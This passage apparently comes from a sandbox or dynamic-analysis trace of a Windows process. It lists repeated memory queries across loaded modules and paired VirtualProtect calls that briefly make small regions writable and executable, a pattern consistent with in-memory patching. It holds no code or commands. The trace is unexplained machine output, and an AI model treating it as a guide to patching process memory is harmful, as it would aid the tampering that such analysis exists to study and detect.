ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.990] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x6190000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x6190000, AllocationBase=0x6190000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x883000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.990] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.990] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9660c0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9660c0000, AllocationBase=0x7ff9660c0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.990] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.990] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966080000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff966080000, AllocationBase=0x7ff966080000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.990] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.990] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977030000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff977030000, AllocationBase=0x7ff977030000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.990] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.991] VirtualProtect (in: lpAddress=0x7ff9770df568, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x2) returned 1 [0208.991] VirtualProtect (in: lpAddress=0x7ff9770df568, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x40) returned 1 [0208.991] VirtualProtect (in: lpAddress=0x7ff9770df5c0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x2) returned 1 [0208.992] VirtualProtect (in: lpAddress=0x7ff9770df5c0, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x40) returned 1 [0208.992] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff965fb0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff965fb0000, AllocationBase=0x7ff965fb0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.992] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.993] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff965fa0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff965fa0000, AllocationBase=0x7ff965fa0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.993] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.993] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff965f00000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff965f00000, AllocationBase=0x7ff965f00000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.993] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.993] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9716a0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9716a0000, AllocationBase=0x7ff9716a0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.993] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.993] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96f7b0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96f7b0000, AllocationBase=0x7ff96f7b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.993] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.994] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973f10000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff973f10000, AllocationBase=0x7ff973f10000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.994] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.994] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96f600000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96f600000, AllocationBase=0x7ff96f600000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.994] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.994] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96def0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96def0000, AllocationBase=0x7ff96def0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.994] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.994] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff965e40000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff965e40000, AllocationBase=0x7ff965e40000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.994] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.995] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977460000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff977460000, AllocationBase=0x7ff977460000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.995] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.995] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9710a0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9710a0000, AllocationBase=0x7ff9710a0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.995] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.995] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974410000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff974410000, AllocationBase=0x7ff974410000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.995] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.995] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9743d0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9743d0000, AllocationBase=0x7ff9743d0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.995] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.995] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973d80000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff973d80000, AllocationBase=0x7ff973d80000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.995] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.995] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96dd70000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96dd70000, AllocationBase=0x7ff96dd70000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.995] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.996] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96dec0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96dec0000, AllocationBase=0x7ff96dec0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.996] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.996] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96f770000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96f770000, AllocationBase=0x7ff96f770000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.996] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.996] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff961e60000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff961e60000, AllocationBase=0x7ff961e60000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.996] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.996] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff961e00000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff961e00000, AllocationBase=0x7ff961e00000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.996] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.996] VirtualProtect (in: lpAddress=0x7ff961e2a858, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x2) returned 1 [0208.997] VirtualProtect (in: lpAddress=0x7ff961e2a858, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x40) returned 1 [0208.998] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff961c00000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff961c00000, AllocationBase=0x7ff961c00000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.998] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.998] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff971b50000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff971b50000, AllocationBase=0x7ff971b50000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.998] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.998] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974790000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff974790000, AllocationBase=0x7ff974790000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.998] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.998] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff965aa0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff965aa0000, AllocationBase=0x7ff965aa0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.998] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.998] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff965980000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff965980000, AllocationBase=0x7ff965980000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.998] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.999] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff961960000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff961960000, AllocationBase=0x7ff961960000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.999] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.999] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff961910000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff961910000, AllocationBase=0x7ff961910000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.999] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.999] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9617d0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9617d0000, AllocationBase=0x7ff9617d0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.000] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.000] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff971e70000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff971e70000, AllocationBase=0x7ff971e70000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.000] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.000] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff971df0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff971df0000, AllocationBase=0x7ff971df0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.000] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.000] VirtualProtect (in: lpAddress=0x7ff971e3a400, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x2) returned 1 [0209.001] VirtualProtect (in: lpAddress=0x7ff971e3a400, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x40) returned 1 [0209.001] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff961750000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff961750000, AllocationBase=0x7ff961750000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.001] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.001] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9616c0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9616c0000, AllocationBase=0x7ff9616c0000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.001] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.001] VirtualProtect (in: lpAddress=0x7ff9617072d0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x2) returned 1 [0209.002] VirtualProtect (in: lpAddress=0x7ff9617072d0, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x40) returned 1 [0209.002] VirtualProtect (in: lpAddress=0x7ff961707298, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x2) returned 1 [0209.003] VirtualProtect (in: lpAddress=0x7ff961707298, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x40) returned 1 [0209.003] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9616b0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9616b0000, AllocationBase=0x7ff9616b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.003] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.003] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff961630000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff961630000, AllocationBase=0x7ff961630000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.003] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.003] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9615e0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9615e0000, AllocationBase=0x7ff9615e0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.004] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.004] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9615c0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9615c0000, AllocationBase=0x7ff9615c0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.004] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.004] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff961570000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff961570000, AllocationBase=0x7ff961570000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.004] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.004] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff971910000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff971910000, AllocationBase=0x7ff971910000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.004] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.004] VirtualQueryEx (in: 